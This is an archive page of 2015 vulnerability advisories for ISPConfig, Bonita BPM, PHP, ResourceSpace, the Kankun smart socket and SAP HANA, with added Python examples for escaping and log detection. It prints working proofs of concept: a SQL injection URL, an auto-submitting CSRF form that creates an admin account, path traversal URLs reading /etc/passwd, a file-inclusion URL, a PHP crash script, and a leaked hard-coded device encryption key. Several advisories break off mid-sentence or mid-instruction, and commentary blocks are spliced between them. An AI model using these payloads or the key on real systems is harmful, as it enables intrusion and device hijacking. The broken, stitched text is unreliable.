https://www.htbridge.com/advisory/HTB23256 - Reflected Cross-Site Scripting 
(XSS) in SearchBlox.
[2] SearchBlox - http://www.searchblox.com - SearchBlox is an Enterprise Search 
& Analytics solution built on Apache Lucene & Elasticsearch.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
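The payload in this advisory, and in the Paid Memberships Pro one further up, begins with `%22%3E` (`">`): it is built for a parameter reflected inside an HTML attribute value, where a bare double quote closes the attribute and the tag and everything after it is parsed as new markup. The Python block below is an added example written for this page, not SearchBlox code; it decodes a constructed query string of that shape and contrasts the unescaped reflection with attribute-context encoding, then adds the stronger option for a menu identifier, which is to reflect only values the application defined itself. The menu names and query string are constructed.

```python
import html
from urllib.parse import parse_qs

# Menu identifiers the admin page knows (constructed list). A reflected value
# that is not one of these never needs to reach the page at all.
KNOWN_MENUS = {"adm", "search", "index", "settings"}

# Constructed query string reproducing the shape of the advisory's payload.
SAMPLE_QUERY = "menu1=adm&menu2=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E"


def menu2_from_query(query: str) -> str:
    return parse_qs(query).get("menu2", [""])[0]


def render_unsafe(menu2: str) -> str:
    """The vulnerable shape: the parameter is interpolated into an attribute
    value unchanged, so a leading '">' closes the attribute and the tag."""
    return f'<input type="hidden" name="menu2" value="{menu2}">'


def render_safe(menu2: str) -> str:
    """Encode for the attribute context; quote=True also encodes " and ', so
    the value can never terminate the attribute it sits in."""
    return f'<input type="hidden" name="menu2" value="{html.escape(menu2, quote=True)}">'


def render_allowlisted(menu2: str) -> str:
    """Stronger still for an identifier: reflect only values the application
    defined, and still encode them so the two defences stay independent."""
    if menu2 not in KNOWN_MENUS:
        raise ValueError(f"unknown menu id: {menu2!r}")
    return render_safe(menu2)


def opens_new_tag(rendered: str) -> bool:
    """Crude check: the fragment should contain exactly one tag, the input."""
    return rendered.count("<") > 1


def allowlist_rejects(menu2: str) -> bool:
    try:
        render_allowlisted(menu2)
    except ValueError:
        return True
    return False
```

Encoding has to match the context the value lands in: `html.escape` with `quote=True` is right for an attribute value or element text, but a value placed inside a script block or a URL needs that context's own encoding instead.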



Multiple Vulnerabilities in ISPConfig

2015-06-10 Thread High-Tech Bridge Security Research
Advisory ID: HTB23260
Product: ISPConfig
Vendor: http://www.ispconfig.org
Vulnerable Version(s): 3.0.5.4p6  and probably prior
Tested Version: 3.0.5.4p6 
Advisory Publication:  May 20, 2015  [without technical details]
Vendor Notification: May 20, 2015 
Vendor Patch: June 4, 2015 
Public Disclosure: June 10, 2015 
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-4118, CVE-2015-4119
Risk Level: High 
CVSSv2 Base Scores: 5.8 (AV:N/AC:L/Au:M/C:P/I:P/A:P),  7.6 
(AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in 
ISPConfig, a popular hosting control panel. The vulnerabilities can be exploited 
to execute arbitrary SQL commands in the application database, perform a CSRF 
attack and gain complete control over the web application.


1) SQL Injection in ISPConfig: CVE-2015-4118

The vulnerability exists due to insufficient filtering of input data passed 
via the server HTTP GET parameter to the /monitor/show_sys_state.php script 
before executing a SQL query. A remote authenticated attacker can pass 
arbitrary SQL commands to the vulnerable script and execute them in the 
application's database. 

Successful exploitation of this vulnerability will allow an attacker to read, 
insert and modify arbitrary records in the database and compromise the entire 
web application, but requires the attacker to be authenticated and to have 
monitor privileges. However, in combination with the CSRF vulnerability to 
which the application is also vulnerable, this vulnerability becomes 
exploitable by a remote non-authenticated attacker. 

The simple exploit below will display the MySQL server version. First, use the 
following HTTP request to execute the SQL query:

https://[host]/monitor/show_sys_state.php?state=serverserver=-1%20UNION%20SELECT%201,version%28%29%20--%202|-

After that visit the page mentioned below, the result of MySQL 'version()' 
function will be displayed in the HTML code of the page:

https://[host]/monitor/show_data.php?type=mem_usage


2) CSRF (Cross-Site Request Forgery) in ISPConfig: CVE-2015-4119

The vulnerability exists because the /admin/users_edit.php script fails to 
properly verify the origin of the HTTP request. A remote attacker can create 
a specially crafted web page with a CSRF exploit, trick a logged-in administrator 
into visiting this page, and create a new user with administrative privileges. 

The simple CSRF exploit below creates an administrative account with username 
immuniweb and password immuniweb:


<form action="https://[host]/admin/users_edit.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="passwort" value="immuniweb">
<input type="hidden" name="repeat_password" value="immuniweb">
<input type="hidden" name="modules[]" value="vm">
<input type="hidden" name="modules[]" value="mail">
<input type="hidden" name="modules[]" value="help">
<input type="hidden" name="modules[]" value="monitor">
<input type="hidden" name="startmodule" value="vm">
<input type="hidden" name="app_theme[]" value="default">
<input type="hidden" name="typ[]" value="admin">
<input type="hidden" name="active" value="1">
<input type="hidden" name="language" value="en">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>


---

Solution:

Update to ISPConfig 3.0.5.4p7

More Information:
http://bugtracker.ispconfig.org/index.php?do=details&task_id=3898

---

References:

[1] High-Tech Bridge Advisory HTB23260 - 
https://www.htbridge.com/advisory/HTB23260 - Multiple vulnerabilities in 
ISPConfig.
[2] ISPConfig - http://www.ispconfig.org - Hosting Control Panel Software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory

Arbitrary File Disclosure and Open Redirect in Bonita BPM

2015-06-10 Thread High-Tech Bridge Security Research
Advisory ID: HTB23259
Product: Bonita BPM
Vendor: Bonitasoft
Vulnerable Version(s):  6.5.1  and probably prior 
Tested Version:  6.5.1 (Windows and Mac OS packages)
Advisory Publication:  May 7, 2015  [without technical details]
Vendor Notification: May 7, 2015 
Vendor Patch: June 9, 2015 
Public Disclosure: June 10, 2015 
Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601]
CVE References: CVE-2015-3897, CVE-2015-3898
Risk Level: High 
CVSSv2 Base Scores: 7.8  (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 
(AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in Bonita 
BPM Portal (Bonita's web interface, running by default on port 8080), which can 
be exploited by a remote non-authenticated attacker to compromise the vulnerable 
web application and the web server on which it is hosted. 

1) Path Traversal in Bonita BPM Portal: CVE-2015-3897

User-supplied input passed via the 'theme' and 'location' HTTP GET parameters 
to the bonita/portal/themeResource URL is not properly verified before being 
used as part of a file name. An attacker may download any system file 
accessible to the web server user.  

The simple PoC below returns the content of the C:/Windows/system.ini file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini

The second PoC discloses the content of the /etc/passwd file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd


2) Open Redirect in Bonita BPM Portal: CVE-2015-3898

Input passed via the 'redirectUrl' HTTP GET parameter to the /bonita/login.jsp 
script and the /bonita/loginservice URL is not properly verified before being 
used as a redirect URL.

After login, the user may be redirected to an arbitrary website:

http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/


---

Solution:

Update to Bonita BPM 6.5.3

More Information:
http://community.bonitasoft.com/blog/bonita-bpm-653-available

---

References:

[1] High-Tech Bridge Advisory HTB23259 - 
https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open 
Redirect in Bonita BPM.
[2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process 
applications - the BPM platform that gives developers freedom to create and 
manage highly customizable business apps. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Use-After-Free in PHP

2015-06-10 Thread High-Tech Bridge Security Research
Advisory ID: HTB23262
Product: PHP 
Vendor: PHP Group
Vulnerable Version(s): 5.6.9 and probably prior
Tested Version: 5.6.9
Advisory Publication:  May 20, 2015  [without technical details]
Vendor Notification: May 20, 2015 
Vendor Patch: June 2, 2015 
Public Disclosure: June 10, 2015 
Vulnerability Type: Use After Free [CWE-416]
Risk Level: Medium 
CVSSv2 Base Score: 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a use-after-free vulnerability 
in PHP, a popular programming language, which can be exploited to cause a crash 
and possibly execute arbitrary code on the target system.

The vulnerability resides within the 'spl_heap_object_free_storage()' PHP 
function, which dereferences already freed memory. A local attacker can cause 
a segmentation fault or possibly execute arbitrary code on the target system 
with the privileges of the web server. 

Below is a simple piece of code that will trigger the crash (the call to the 
undefined method is intentional: the resulting fatal error is what leaves the 
heap object in a freed state):

<?php
class SplMinHeap1 extends SplMinHeap {
  public function compare($a, $b) {
    return -parent::notexist($a, $b);
  }
}
$h = new SplMinHeap1();
$h->insert(1);
$h->insert(6);
$h->insert(5);
$h->insert(2);
?>

Running the PoC above we get:


gdb-peda$ r ~/Desktop/heap_uaf.php 
Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php
PHP Fatal error:  Call to undefined method SplMinHeap::notexist() in 
/home/test/Desktop/heap_uaf.php on line 4

Fatal error: Call to undefined method SplMinHeap::notexist() in 
/home/test/Desktop/heap_uaf.php on line 4

Program received signal SIGSEGV, Segmentation fault.
[--registers---]
RAX: 0x5a5a5a5a5a5a5a5a ()
RBX: 0x800 
RCX: 0xcd0458 (/home/test/De...)
RDX: 0x16f 
RSI: 0xcd0458 (/home/test/De...)
RDI: 0x5a5a5a5a5a5a5a5a ()
RBP: 0x7fffc570 --> 0x7fffc5a0 --> 0x7fffc5d0 --> 0x7fffc600 
--> 0x7fffc630 --> 0x7fffc750 --> 0x7fffc850 --> 0x7fffc9b0 --> 
0x7fffdcf0 --> 0x7fffde50 --> 0x0 
RSP: 0x7fffc570 --> 0x7fffc5a0 --> 0x7fffc5d0 --> 0x7fffc600 
--> 0x7fffc630 --> 0x7fffc750 --> 0x7fffc850 --> 0x7fffc9b0 --> 
0x7fffdcf0 --> 0x7fffde50 --> 0x0 
RIP: 0x82a96f (<zval_delref_p+12>:  mov    eax,DWORD PTR [rax+0x10])
R8 : 0x269 
R9 : 0x0 
R10: 0x7fff9b20 --> 0x0 
R11: 0x771102f0 --> 0xfffda6c0fffda3ef 
R12: 0x4209e0 (<_start>:  xor    ebp,ebp)
R13: 0x7fffdf30 --> 0x2 
R14: 0x0 
R15: 0x0
[-code-]
   0x82a964 <zval_delref_p+1>:  mov    rbp,rsp
   0x82a967 <zval_delref_p+4>:  mov    QWORD PTR [rbp-0x8],rdi
   0x82a96b <zval_delref_p+8>:  mov    rax,QWORD PTR [rbp-0x8]
=> 0x82a96f <zval_delref_p+12>: mov    eax,DWORD PTR [rax+0x10]
   0x82a972 <zval_delref_p+15>: lea    edx,[rax-0x1]
   0x82a975 <zval_delref_p+18>: mov    rax,QWORD PTR [rbp-0x8]
   0x82a979 <zval_delref_p+22>: mov    DWORD PTR [rax+0x10],edx
   0x82a97c <zval_delref_p+25>: mov    rax,QWORD PTR [rbp-0x8]
[stack-]


As seen above, PHP crashes when trying to dereference the value in $rax, which 
has already been freed (the 0x5a fill pattern is the allocator's poisoning of 
released memory).


Stopped reason: SIGSEGV
0x0082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at 
/home/test/Desktop/php-5.6.9/Zend/zend.h:411
411 return --pz->refcount__gc;

Running the backtrace command, we can see a couple of freed variables, 
zval_ptr and pz:
gdb-peda$ bt
#0  0x0082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at 
/home/test/Desktop/php-5.6.9/Zend/zend.h:411
#1  0x0082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a, 
__zend_filename=0xcd0458 /home/test/De..., __zend_lineno=0x16f) at 
/home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76
#2  0x0082bdcb in _zval_ptr_dtor (zval_ptr=0x77fcba88, 
__zend_filename=0xcd0458 /home/test/De..., __zend_lineno=0x16f) at 
/home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424
#3  0x006e5c1a in spl_heap_object_free_storage (object=0x77dfdfa0) 
at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367
#4  0x0087f566 in zend_objects_store_free_object_storage 
(objects=0x102e640 executor_globals+928) at 
/home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97
#5  0x0082b89e in shutdown_executor () at 
/home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290
#6  0x00841a4c in zend_deactivate () at 
/home/test/Desktop/php-5.6.9/Zend/zend.c:960
#7  0x007a7c40 in php_request_shutdown (dummy

Hardcoded AES 256 bit key used in Kankun IoT/Smart socket and its mobile App

2015-06-08 Thread Payatu Research
Hi List,

Vulnerability
=
Hardcoded AES 256 bit key used in Kankun IoT/Smart socket and its mobile App

Vulnerability Description
==
The Kankun smart socket device and its mobile app use a hardcoded AES
256-bit key to encrypt the commands and responses exchanged between the
device and the app. The communication happens over UDP. An attacker on the
local network can use the same key to encrypt and send unsolicited
commands to the device and hijack it.

CVE ID

CVE-2015-4080

Vendor

www.ikonke.com

Product
=
Kankun Smart Socket

Disclosure Timeline

1. 25 May 2015 – Reported to Vendor, no response.
2. 29 May 2015 – Reminder sent to vendor, no response.
3. 5 June 2015 – Public disclosure.

Credits
=
1. Aseem Jakhar, Director - Research, Payatu Technologies Pvt. Ltd.
2. At the time of publishing the finding, we searched online for the same
issue and found that someone else had also published the key. In good
faith we would like to mention that person, who goes by the handle
kankun hacker - https://plus.google.com/109112844319840106704/posts -
although both pieces of research were independent of each other and we
do not know who kankun hacker is.

About Payatu

Payatu Technologies is a boutique security testing company. We
specialize in Mobile/IoT/Product/Application security testing.

PoC exploit source code

https://bitbucket.org/aseemjakhar/kcmd

Technical details
==

We performed our analysis on the Android app and the device. The user
manual specifies the app to be used with the device -
http://kk.huafeng.com:8081/none/android/smartwifi.apk. There is a newer
version of the app on the Google Play store which is also vulnerable -
https://play.google.com/store/apps/details?id=hangzhou.zx


Communication
--
The communication between the app and the device happens over UDP.
The commands are broadcast on the network to UDP destination port 27431.


App Reversing

- We decompiled the app using apktool.
- The app has a native shared library, libNDK_03.so, which contains the
encryption logic and the hard-coded key.
- We analysed the app and worked out the command/response protocol
used between the app and the device.
- The Java code uses JNI functions to encrypt and decrypt the commands
and responses. The functions are encode() and decode(). Interestingly,
there is also a function called add() which adds its two parameters
and returns the result. This must be a test function left over from the
early development of the library :).

- The command and response for switching ON and OFF is a 4-step process:
  - Step 1 - App sends an Open/Close request (Open means switch ON,
Close means switch OFF)
  - Step 2 - Device sends a response containing a confirmation ID (a number)
  - Step 3 - App sends the confirmation request along with the
confirmation ID received from the device
  - Step 4 - Device sends an acknowledgement and switches the socket ON/OFF
  - An example of the communication protocol to switch ON the device,
assuming the MAC address of the device is “de:ad:de:ad:de:ad”, the
password set by the user is “secretpass” and the confirmation ID is
70018. If the user has not set an encryption password, the string
“nopassword” is used instead.

  APP --> lan_phone%de:ad:de:ad:de:ad%secretpass%open%request --> DEVICE
  DEVICE --> lan_device%de:ad:de:ad:de:ad%secretpass%confirm#70018%rack --> APP

  APP --> lan_phone%de:ad:de:ad:de:ad%secretpass%confirm#70018%request
--> DEVICE
  DEVICE --> lan_device%de:ad:de:ad:de:ad%secretpass%open%rack --> APP

  - As you can see above, the communication is a simple string whose
fields are separated by the % character. The fields are self-explanatory.
There is also a wan_phone / wan_device option which we did not test.

- A quick run of strings showed the key along with other strings.
This particular string looked a little interesting and we started
reversing the native library.
- Output of $ strings libNDK_03.so (excerpt):


UUPx((
Zw--
fdsl;mewrjope456fds4fbvfnjwaugfo
java/lang/String



- The installed library is not stripped.
- In the library the JNI encode/decode functions call
EncryptData/DecryptData respectively:

3990 <Java_hangzhou_kankun_WifiJniC_encode>:
3990:       b5f0        push    {r4, r5, r6, r7, lr}
3992:       b085        sub     sp, #20
3994:       1c11        adds    r1, r2, #0

39b6:       2380        movs    r3, #128    ; 0x80
39b8:       f7ff ff0e   bl      37d8 <EncryptData>


- EncryptData() internally calls aes functions, which means it is
using AES encryption:

37d8 <EncryptData>:
37d8:       b5f0        push    {r4, r5, r6, r7, lr}
37da:       465f        mov     r7, fp
37dc:       4656        mov     r6, sl

3868:       9001        str     r0, [sp, #4]
386a:       f7fd fb8b   bl
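The four-step open/confirm exchange described above, modelled at the plaintext layer as an added example (not Payatu's PoC or the vendor's code). The field names, the device-side checks and the confirmation-ID counter are assumptions drawn from the captured strings; the AES layer and the hard-coded key are deliberately left out.

```python
"""Plaintext layer of the Kankun smart-socket LAN protocol: message format and
the four-step open/confirm exchange.

Added example, not Payatu's PoC or the vendor's code.  Field names, the
device-side checks and the confirmation-ID sequence are assumptions; the AES
layer and the hard-coded key are deliberately left out.
"""
from dataclasses import dataclass
from itertools import count
from typing import Iterator, Optional

SEP = "%"                      # field separator seen in the captured strings
ROLES = ("lan_phone", "lan_device")
KINDS = ("request", "rack")    # app -> device, device -> app


@dataclass(frozen=True)
class Message:
    role: str       # "lan_phone" (app) or "lan_device" (socket)
    mac: str        # device MAC, e.g. "de:ad:de:ad:de:ad"
    password: str   # user password, or "nopassword" when none is set
    command: str    # "open", "close" or "confirm#<id>"
    kind: str       # "request" or "rack"

    def encode(self) -> str:
        return SEP.join((self.role, self.mac, self.password, self.command, self.kind))


def parse_message(raw: str) -> Message:
    """Split a %-separated command string into its five fields, rejecting junk."""
    parts = raw.split(SEP)
    if len(parts) != 5:
        raise ValueError(f"expected 5 fields, got {len(parts)}: {raw!r}")
    role, mac, password, command, kind = parts
    if role not in ROLES or kind not in KINDS:
        raise ValueError(f"unknown role/kind in {raw!r}")
    return Message(role, mac, password, command, kind)


def confirmation_id(command: str) -> Optional[int]:
    """Return the number from 'confirm#70018', or None for any other command."""
    prefix = "confirm#"
    if command.startswith(prefix) and command[len(prefix):].isdigit():
        return int(command[len(prefix):])
    return None


class SmartSocketSim:
    """Device side of the exchange (assumed behaviour).  The only gate is the
    MAC and password carried in clear inside every packet, so anyone holding
    the shared AES key who has seen one packet can drive the relay."""

    def __init__(self, mac: str, password: str = "nopassword",
                 ids: Optional[Iterator[int]] = None) -> None:
        self.mac = mac
        self.password = password
        self.state = "close"                      # relay state: "open"/"close"
        self._ids = ids if ids is not None else count(70018)  # assumed counter
        self._pending: dict[int, str] = {}        # confirmation id -> action

    def handle(self, raw: str) -> Optional[str]:
        """Process one app request; return the reply, or None to stay silent."""
        msg = parse_message(raw)
        if msg.role != "lan_phone" or msg.kind != "request":
            return None
        if msg.mac != self.mac or msg.password != self.password:
            return None
        cid = confirmation_id(msg.command)
        if cid is None:                           # step 1 -> step 2
            if msg.command not in ("open", "close"):
                return None
            cid = next(self._ids)
            self._pending[cid] = msg.command
            reply = f"confirm#{cid}"
        else:                                     # step 3 -> step 4
            action = self._pending.pop(cid, None)
            if action is None:
                return None                       # unknown or replayed id
            self.state = action
            reply = action
        return Message("lan_device", self.mac, self.password, reply, "rack").encode()


def switch(device: SmartSocketSim, mac: str, password: str, action: str) -> list[str]:
    """App side: run the full four-step exchange and return the transcript."""
    transcript = [Message("lan_phone", mac, password, action, "request").encode()]
    challenge = device.handle(transcript[0])
    if challenge is None:                         # device ignored the request
        return transcript
    transcript.append(challenge)
    cid = confirmation_id(parse_message(challenge).command)
    confirm = Message("lan_phone", mac, password, f"confirm#{cid}", "request")
    transcript.append(confirm.encode())
    ack = device.handle(confirm.encode())
    if ack is not None:
        transcript.append(ack)
    return transcript


if __name__ == "__main__":
    sock = SmartSocketSim("de:ad:de:ad:de:ad", "secretpass")
    for line in switch(sock, "de:ad:de:ad:de:ad", "secretpass", "open"):
        print(line)
    print("relay state:", sock.state)
```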

Local PHP File Inclusion in ResourceSpace

2015-06-03 Thread High-Tech Bridge Security Research
Advisory ID: HTB23258
Product: ResourceSpace
Vendor: Montala Limited
Vulnerable Version(s): 7.1.6513 and probably prior
Tested Version: 7.1.6513
Advisory Publication:  May 6, 2015  [without technical details]
Vendor Notification: May 6, 2015 
Vendor Patch: June 1, 2015 
Public Disclosure: June 3, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-3648
Risk Level: High 
CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in 
ResourceSpace, which can be exploited to include an arbitrary local PHP file, 
execute PHP code, and compromise the vulnerable web application and even the 
entire web server on which the application is hosted. 

The vulnerability exists due to the absence of filtration of the 
'defaultlanguage' HTTP GET parameter received from the user before it is used 
to include a PHP file via the include() PHP function in the /pages/setup.php 
script. The installation script /pages/setup.php remains on the system after 
installation by default and is remotely accessible to non-authenticated users.

The simple PoC below includes the local file /tmp/file.php:

http://[host]/pages/setup.php?defaultlanguage=../../../../../tmp/file


---

Solution:

Update to ResourceSpace 7.2.6727

More Information:
http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738

---

References:

[1] High-Tech Bridge Advisory HTB23258 - 
https://www.htbridge.com/advisory/HTB23258 - Local PHP File Inclusion in 
ResourceSpace.
[2] ResourceSpace - http://resourcespace.org - ResourceSpace open source 
digital asset management software is the simple, fast, & free way to 
organise your digital assets.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
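The GET-based PoCs in the ISPConfig (CVE-2015-4118), Bonita BPM (CVE-2015-3897, CVE-2015-3898) and ResourceSpace (CVE-2015-3648) advisories all leave a recognisable trace in a web server's access log. The detector below is an added example, not code from any of the vendors or from High-Tech Bridge; the log lines are constructed, with documentation IP addresses in place of real clients and the advisories' [host] placeholder dropped in favour of path-only request targets.

```python
"""Access-log detection for the web PoCs in the ISPConfig, Bonita BPM and
ResourceSpace advisories (added example, not vendor code).

The log lines are constructed; the client IPs are documentation addresses.
"""
import re
from typing import Callable, Iterable
from urllib.parse import parse_qsl, unquote, urlsplit


def has_union_select(value: str) -> bool:
    """CVE-2015-4118: UNION SELECT smuggled into the 'server' parameter."""
    return re.search(r"union\s+select", value, re.IGNORECASE) is not None


def has_traversal(value: str) -> bool:
    """CVE-2015-3897 / CVE-2015-3648: '../' sequences in a file-name parameter."""
    return "../" in value or "..\\" in value


def is_external_redirect(value: str) -> bool:
    """CVE-2015-3898: protocol-relative ('//host') or absolute redirect target."""
    return value.startswith("//") or re.match(r"[a-z][a-z0-9+.-]*://", value, re.I) is not None


# (path suffix, query parameter, predicate, label): one rule per advisory item.
RULES: list[tuple[str, str, Callable[[str], bool], str]] = [
    ("/monitor/show_sys_state.php", "server", has_union_select, "ISPConfig SQLi CVE-2015-4118"),
    ("/bonita/portal/themeResource", "theme", has_traversal, "Bonita traversal CVE-2015-3897"),
    ("/bonita/portal/themeResource", "location", has_traversal, "Bonita traversal CVE-2015-3897"),
    ("/bonita/login.jsp", "redirectUrl", is_external_redirect, "Bonita open redirect CVE-2015-3898"),
    ("/bonita/loginservice", "redirectUrl", is_external_redirect, "Bonita open redirect CVE-2015-3898"),
    ("/pages/setup.php", "defaultlanguage", has_traversal, "ResourceSpace LFI CVE-2015-3648"),
]

# Apache/nginx combined format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def inspect_request(target: str) -> list[str]:
    """Return the labels of every rule matched by one request target (path + query)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    # parse_qsl decodes %XX and '+'; keep_blank_values so 'theme=' alone is still seen.
    params = parse_qsl(parts.query, keep_blank_values=True)
    hits: list[str] = []
    for suffix, name, predicate, label in RULES:
        if not path.endswith(suffix):
            continue
        for key, value in params:
            # The second unquote catches double-encoded payloads such as %252e%252e/
            if key == name and predicate(unquote(value)) and label not in hits:
                hits.append(label)
    return hits


def scan_log(lines: Iterable[str]) -> list[tuple[str, str, str]]:
    """Return (client_ip, label, target) for each suspicious request in the log."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if match is None:
            continue  # not a combined-format line; skip rather than crash
        for label in inspect_request(match["target"]):
            findings.append((match["ip"], label, match["target"]))
    return findings


SAMPLE_LOG = [  # constructed lines reproducing the advisories' PoC requests
    '203.0.113.5 - - [10/Jun/2015:12:00:01 +0000] "GET /monitor/show_sys_state.php'
    '?state=server&server=-1%20UNION%20SELECT%201,version%28%29%20--%202|- HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jun/2015:12:00:02 +0000] "GET /monitor/show_data.php?type=mem_usage HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Jun/2015:12:01:00 +0000] "GET /bonita/portal/themeResource'
    '?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1" 200 1337',
    '198.51.100.7 - - [10/Jun/2015:12:01:05 +0000] "GET /bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/ HTTP/1.1" 302 0',
    '192.0.2.9 - - [03/Jun/2015:09:30:00 +0000] "GET /pages/setup.php?defaultlanguage=../../../../../tmp/file HTTP/1.1" 200 300',
    '192.0.2.9 - - [03/Jun/2015:09:31:00 +0000] "GET /pages/setup.php?defaultlanguage=en HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, label, target in scan_log(SAMPLE_LOG):
        print(f"{ip:14} {label:36} {target}")
```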



[Onapsis Security Advisory 2015-007] SAP HANA Log Injection Vulnerability

2015-05-27 Thread Onapsis Research Labs

Onapsis Security Advisory ONAPSIS-2015-007: SAP HANA Log Injection
Vulnerability

1. Impact on Business
=

Under certain conditions the SAP HANA XS engine is vulnerable to arbitrary
log injection, allowing remote authenticated attackers to write arbitrary
information into log files. This could be used to corrupt log files or to
add fake content that misleads an administrator.

Risk Level: Medium

2. Advisory Information
===

- Public Release Date: 2015-05-27
- Subscriber Notification Date: 2015-05-27
- Last Revised: 2015-05-27
- Security Advisory ID: ONAPSIS-2015-007
- Onapsis SVS ID: ONAPSIS-00140
- CVE: CVE-2015-3994
- Researcher: Fernando Russ, Nahuel D. Sánchez
- Initial Base CVSS v2:  4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)


3. Vulnerability Information


- Vendor:  SAP A.G.
- Affected Components: SAP HANA DB 1.00.73.00.389160 (NewDB100_REL)
- Vulnerability Class: Improper Output Neutralization for Logs (CWE-117)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory:
http://www.onapsis.com/research/security-advisories/SAP-HANA-log-injection-vulnerability-in-extended-application-services

4. Affected Components Description
==

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.

5. Vulnerability Details


Under certain conditions a remote authenticated attacker can inject log
lines by performing specially crafted HTTP requests against the vulnerable
SAP HANA XS Engine.

